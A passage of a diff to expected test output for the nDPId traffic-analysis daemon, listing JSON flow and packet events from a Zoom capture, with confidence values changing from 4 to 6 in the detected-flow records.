{"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01125{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01125{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520467785} 
00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520466531,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569520467811,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520467811,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEABEHgAAAQEICiWc1TCZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} 
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 
00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569520468207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520468207,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjTKAAAAQEICiWc1rxwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569520468207,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1569520468207,"pkt":"AQBef\/\/6KDc3AG3ICABFAACaDxkAAAER+CLAqAF17\/\/\/+t7BB2wAhjkTTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520468399,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569520468399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569520468399,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABgjegAAEARZ+DAqAF1wKgB\/wCJAIkATBmVRZdAEAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEAAAOEAAbgAMCoAXU="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520468399,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569520468399,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1569520468399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569520468399,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABgqi0AAEARS5vAqAF1wKgB\/wCJAIkATJqXRZhAEAABAAAAAAABIEVNRkZFREVCRkRDTkVKRU5FQkVEQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEAAAOEAAZgAMCoAXU="} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1569520468399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569520468399,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABgHVYAAEAR2HLAqAF1wKgB\/wCJAIkATJqURZlAEAABAAAAAAABIEVNRkZFREVCRkRDTkVKRU5FQkVEQ0FDQUNBQ0FDQUNBAAAgAAHADAAgAAEAAAOEAAZgAMCoAXU="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569520468922,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1569520468922,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA59vgAAP8RQPTAqAF1wKgBAftgADUAJTi0e18BAAABAAAAAAAAA2xvZwR6b29tAnVzAAABAAE="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": 
{"query":"log.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569520468958,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569520468958,"pkt":"KDc3AG3IEBMx8Tl2CABFAABJ++kAADcRA\/TAqAEBwKgBdQA1+2AANbDee1+BgAABAAEAAAAAA2xvZwR6b29tAnVzAAABAAHADAABAAEAAAA8AAQ0yj7u"} -00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520468958,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.238"}} +00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569520468958,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.238"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468959,"flow_last_seen":1569520468959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520468959,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569520468959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520468959,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOPAqAF1NMo+7tZQAbuf1vAbAAAAALAC\/\/+Z4QAAAgQFtAEDAwUBAQgKJZzZqwAAAAAEAgAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569520469036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1569520469036,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAzKPoAAP8RDvnAqAF1wKgBAf9yADUAH9x7wYgBAAABAAAAAAAABWxvY2FsAAAGAAE="} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469036,"flow_last_seen":1569520469036,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569520469036,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569520469067,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469067,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVu40yj7uwKgBdQG71lCVbT6Un9bwHIASaQOUKgAAAgQFrAEBBAIBAwMM"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569520469067,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520469067,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBPvAqAF1NMo+7tZQAbuf1vAclW0+lVAQIAAd\/QAA"} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569520469072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1569520469072,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB+D5oAADcR8A7AqAEBwKgBdQA1\/3IAaoTewYiBgwABAAAAAQAABWxvY2FsAAAGAAEAAAYAAQAACY8AQAFhDHJvb3Qtc2VydmVycwNuZXQABW5zdGxkDHZlcmlzaWduLWdycwNjb20AeFjoeAAABwgAAAOEAAk6gAABUYA="} 
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"zoom.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469036,"flow_last_seen":1569520469072,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":65394,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569520469072,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469072,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4d+0AAEABfxHAqAF1wKgBAQMD\/OoAAAAARQAAfg+aAAA3EfAOwKgBAcCoAXUANf9yAGoAAA=="} -00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"zoom.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469072,"flow_last_seen":1569520469072,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469072,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.637537} 
